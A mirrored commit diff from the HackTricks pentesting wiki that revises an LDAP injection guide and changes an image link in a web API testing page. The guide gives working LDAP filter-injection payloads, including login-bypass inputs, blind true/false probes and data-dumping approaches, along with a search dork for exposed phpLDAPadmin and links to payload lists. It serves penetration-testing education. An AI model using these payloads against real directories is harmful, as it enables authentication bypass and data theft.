Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] 2 pages and 4 assets modified

Browse source
This commit is contained in:
CPol 2021-06-08 21:58:39 +00:00 committed by gitbook-bot
parent c2b98f8fb4
commit a24d4e91d6
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
6 changed files with 32 additions and 15 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

BIN
.gitbook/assets/image (535).png
View file

Binary file not shown.
Side by side Swipe Overlay

Before

Width:  |  Height:  |  Size: 73 KiB

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (536).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 96 KiB

BIN
.gitbook/assets/image (537).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 73 KiB

BIN
.gitbook/assets/image (538).png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 205 KiB

45
pentesting-web/ldap-injection.md
View file

@ -27,30 +27,28 @@
**\(\|\)** = Absolute FALSE **\(\|\)** = Absolute FALSE
For example: For example:
\(&\(!\(objectClass=Impresoras\)\)\(uid=s\*\)\) `(&(!(objectClass=Impresoras))(uid=s*))
\(&\(objectClass=user\)\(uid=\*\)\) (&(objectClass=user)(uid=*))`
You can access to the database, and this can content information of a lot of different types. You can access to the database, and this can content information of a lot of different types.
The backups of LDAP uses the extension _ldif_
**OpenLDAP**: If 2 filters arrive, only executes the first one. **OpenLDAP**: If 2 filters arrive, only executes the first one.
**ADAM or Microsoft LDS**: With 2 filters they throw an error. **ADAM or Microsoft LDS**: With 2 filters they throw an error.
**SunOne Directory Server 5.0**: Execute both filters. **SunOne Directory Server 5.0**: Execute both filters.
**It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.** **It is very important to send the filter with correct syntax or an error will be thrown. It is better to send only 1 filter.**
The filter has to start with: _&_ or _\|_ The filter has to start with: `&` or `|`
Example: _\(&\(directory=val1\)\(folder=public\)\)_ Example: `(&(directory=val1)(folder=public))`
\(&\(objectClass=VALUE1\)\(type=Epson\*\)\) `(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = _\*\)\(ObjectClass=\*\)\)\(&\(objectClass=void_ VALUE1 = *)(ObjectClass=*))(&(objectClass=void`
Then: _\(&\(objectClass=**\*\)\(ObjectClass=\*\)\)**_ will be the first filter \(the one executed\). Then: `(&(objectClass=`**`*)(ObjectClass=*))`** will be the first filter \(the one executed\).
## Login Bypass ## Login Bypass
LDAP supports several formats to store the password: clear, md5, smd5, sh1, ssha, crypt. So, it could be that independently of what you insert inside the password, it is hashed. LDAP supports several formats to store the password: clear, md5, smd5, sh1, sha, crypt. So, it could be that independently of what you insert inside the password, it is hashed.
```bash ```bash
user=* user=*
@ -92,7 +90,7 @@ password=pwd
```bash ```bash
username = admin)(!(&(| username = admin)(!(&(|
pass = any)) pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSO then the user is admin and the password check is True. --> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
``` ```
```bash ```bash
@ -107,12 +105,29 @@ password=any
--> (&(uid=admin)) (| (|) (webpassword=any)) --> (&(uid=admin)) (| (|) (webpassword=any))
``` ```
### Lists
[LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt) [LDAP\_FUZZ](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_FUZZ.txt)
[LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt) [LDAP Attributes](https://raw.githubusercontent.com/swisskyrepo/PayloadsAllTheThings/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)
[LDAP\_authBypass](https://feelsec.info/wp-content/uploads/2018/11/LDAP_authBypass.txt)
## Blind LDAP Injection ## Blind LDAP Injection
You may force False or True responses to check if any data is returned and confirm a possible Blind LDAP Injection:
```bash
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
```
```bash
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
```
### Dump data
You can iterate over the ascii letters, digits and symbols: You can iterate over the ascii letters, digits and symbols:
```bash ```bash
@ -130,7 +145,7 @@ You can iterate over the ascii letters, digits and symbols:
### **Discover valid LDAP fields** ### **Discover valid LDAP fields**
LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of **\*\*\[**default LDAP attributes here**\]\(**[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP Injection/Intruder/LDAP\_attributes.txt](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt)**\)**.\*\* LDAP objects **contains by default several attributes** that could be used to **save information**. You can try to **brute-force all of them to extract that info.** You can find a list of [**default LDAP attributes here**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/Intruder/LDAP_attributes.txt).
```python ```python
#!/usr/bin/python3 #!/usr/bin/python3
@ -189,5 +204,7 @@ for i in range(50):
intitle:"phpLDAPadmin" inurl:cmd.php intitle:"phpLDAPadmin" inurl:cmd.php
``` ```
## More Payloads
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection) [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection)

2
pentesting/pentesting-web/web-api-pentesting.md
View file

@ -25,7 +25,7 @@ These kind of APIs may be [**vulnerable to XXE**](../../pentesting-web/xxe-xee-x
You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\) You could also try to use CDATA tags to insert payloads \(as long as the XML is valid\)
![](../../.gitbook/assets/image%20%28535%29.png) ![](../../.gitbook/assets/image%20%28537%29.png)
### Check Access ### Check Access